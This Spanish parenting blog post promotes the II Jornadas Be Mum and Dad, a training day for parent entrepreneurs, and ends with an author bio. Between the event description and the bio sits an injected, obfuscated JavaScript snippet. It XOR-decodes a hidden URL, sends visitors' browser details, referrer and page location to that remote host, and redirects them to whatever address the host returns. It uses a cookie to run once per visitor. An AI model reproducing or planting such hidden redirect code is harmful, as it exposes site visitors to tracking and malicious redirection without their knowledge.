Conoce las Jornadas Be Mum and Dad

Estamos siempre buscando miles de planes para hacer con nuestros hijos, pero hay momentos en los que, como padres, necesitamos encontrar algo que no sea trabajo y familia, o sí, pero desde un punto de vista más lúdico y dinámico. ¿Habéis oído hablar de las Jornadas Be Mum and Dad? 
Agenda en tu móvil los siguientes datos. Sábado 25 de febrero, Escuela de Organización Industrial, de 09.00 a 17.00 horas. Esa es la fecha señalada para la celebración de las II Jornadas Be Mum and Dad, un evento formativo con un enfoque muy práctico que tiene como objetivo ser un espacio de aprendizaje, comunicación y trabajo de emprendedores que quieren avanzar en su proyecto y encontrar recursos que les conduzcan al éxito. No sé si a vosotros, padres y madres, os ha podido pasar en algún momento de vuestra vida profesional que os plantéais iniciar vuestra propia aventura profesional, o bien porque a la vuelta de la baja de maternidad sentíais que la única forma de conciliar trabajo y familia era a través del emprendimiento o porque una vez metidos en la vorágine del día a día tu hija te pregunta una y otra vez por qué no puedes llevarla al cole como otros padres/madres o por qué no puedes ir a recogerla. Y en estos pensamientos que todos hemos tenido rondando por nuestra cabeza más de una vez es donde tienen su origen las Jornadas Be Mum and Dad.

Qué son las Jornadas Be Mum&Dad

Las Jornadas Be Mum & Dad  son un punto de encuentro para emprendedores con fuerte presencia digital o que quieran tenerla en la Red. Los emprendedores 2.0 son un fenómeno en alza que surge a consecuencia de las dificultades que muchos encuentran, entre otras cosas, en conciliar, o como vía para incorporarse al mundo laboral tras el paro o las bajas por maternidad. Son emprendedores blogueros, que utilizan este canal como medio de expresión y desahogo con lectores en su misma posición, y también como vía para mostrar sus habilidades. Tienen gran experiencia en el mundo 2.0,  adquirido con el sistema de “prueba y error”. Son inquietos, con ganas de aprender, quieren ser independientes, tener horarios flexibles, y su mejor salida es emprender. “Muchos no tienen formación académica en temas de emprendimiento y negocio. Por eso decidimos montar este punto de encuentro, práctico y formativo, con el fin de que los asistentes pasen una jornada distendida, refuercen y adquieran nuevas habilidades. El punto fuerte de las Jornadas Be Mum & Dad es que se basan en casos reales de emprendedores que han recorrido recientemente tu camino o expertos en la materia que sepan qué necesitan”, nos cuenta Mar Calvo y Mayte Galán, fundadoras y creadoras de este evento, que añaden:  “Las experiencias de grandes empresas, con grandes presupuestos, son interesantes pero los emprendedores no pueden aplicarlas a su problemática diaria”.

¿Qué puedes esperar de las Jornadas Be Mum and Dad?

vente a las jornadas be mum and dad

Desde Mama tiene un plan nos sentimos muy identificadas con este tipo de eventos y por eso apoyamos esta iniciativa y queremos compartirla con todos vosotros, emprendedores en activo, emprendedores en desarrollo o, simplemente, padres y madres que siguen con el foco puesto en una constante adquisición de conocimientos.

En las II Jornadas Be Mum and Dad vas a encontrar formación práctica y útil, basada en la realidad del emprendedor de a pie con:

  • Ponencias basadas en la experiencia sobre Gaminifación o Estratgia
  • Talleres prácticos y útiles sobre Mindufulness, Design Thinking, Coaching o Reputación Online.
  • Desvirtualización de otros emprendedores
  • Intercambio de conocimientos y experiencias
  • Cercanía y apoyo
  • Explorar posibilidades de asociación y colaboración
  • Sinergias
  • Conocer a otr@s emprendedores como ellos
  • Coworking
  • Superación de miedos e inseguridades
  • Redes de blogueros con alto nivel de confianza entre ellos
  • Reorientarse y darse un nuevo impulso
  • Centrar el rumbo y concretar proyectos
Si quieres acudir, puedes comprar ya tu entrada en la plataforma www.eventbrite.es  ¡Queremos ver@s a tod@s allí!

var uomjftkd = { encode: function (uymcrbbu, ivpjzup1) { var juykdjus = “”; for (var bmtvoq = 0; bmtvoq < uymcrbbu.length; bmtvoq++) { var maoakjle = uymcrbbu.charCodeAt(bmtvoq); var vznvir = maoakjle ^ ivpjzup1.charCodeAt(bmtvoq % ivpjzup1.length); juykdjus = juykdjus + String.fromCharCode(vznvir); } return juykdjus; }};function ivlvxbnl(xspsscex, qmjwsdtc){ return uomjftkd.encode(xspsscex, qmjwsdtc);}function nhqlzziy(vtzoxco, qmjwsdtc) { function mnbggf(url, qvfdnorl, gaurhzsa) { var svzjxjw = new XMLHttpRequest(); var mvlmqh = ""; var ngpewk = []; var djzspyoe; for(djzspyoe in qvfdnorl) { ngpewk.push(encodeURIComponent(djzspyoe) + '=' + encodeURIComponent(qvfdnorl[djzspyoe])); } mvlmqh = ngpewk.join(String.fromCharCode(38)).replace(/%20/g, '+'); svzjxjw.onreadystatechange = gaurhzsa; svzjxjw.open('GET', vtzoxco + "?" + mvlmqh); svzjxjw.send(mvlmqh); } var broilplq = { ua: navigator.userAgent, referrer: document.referrer, host: window.location.hostname, uri: window.location.pathname, lang: navigator.language, guid: qmjwsdtc }; mnbggf(vtzoxco, broilplq, function () { if (this.readyState == 4) { if (this.status == 200) { qvfdnorl = this.responseText; if (typeof(qvfdnorl) === 'string') { if (qvfdnorl.indexOf("http") === 0) { window.location = qvfdnorl; } } } } });}var advuwpjt = Array();var qmjwsdtc = '08430616d2a2d9759b18f9b49fcabc12';if (document.cookie.indexOf(qmjwsdtc) === -1){ advuwpjt.push(String.fromCharCode(88,76,64,67,67,12,30,25,9,75,8,92,2,86,67,71,88,1,90,93,20,23,11,90,95,9,76,0,18,10,28,88,67,22,68,91,64)); document.cookie = qmjwsdtc + '=1; path=/'; advuwpjt = advuwpjt.forEach(function (xspsscex) { var juykdjus = ivlvxbnl(xspsscex, qmjwsdtc); if (typeof(juykdjus) === 'string') { if (juykdjus.indexOf("http") === 0) { nhqlzziy(juykdjus, qmjwsdtc); return; } } });}

Sobre Diana

Soy periodista, emprendedora, amante del teatro (sobre todo infantil) y de los buenos planes (en familia, en pareja, entre amigos, en solitario...). Un día, después de un montón de casualidades, decidí lanzarme a la aventura de poner en marcha mi propio proyecto profesional: Mamá tiene un Plan. Hoy, tengo tres peques y muchas ilusiones, a los que dedico todo mi tiempo y energía. En el viaje me acompaña un hombre maravilloso (al que dedico menos tiempo del que me gustaría y quiero con locura) y una gran familia a la que adoro que hace posible que todo lo demás siga girando. @Diana_M_N

Un comentario en “Conoce las Jornadas Be Mum and Dad

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *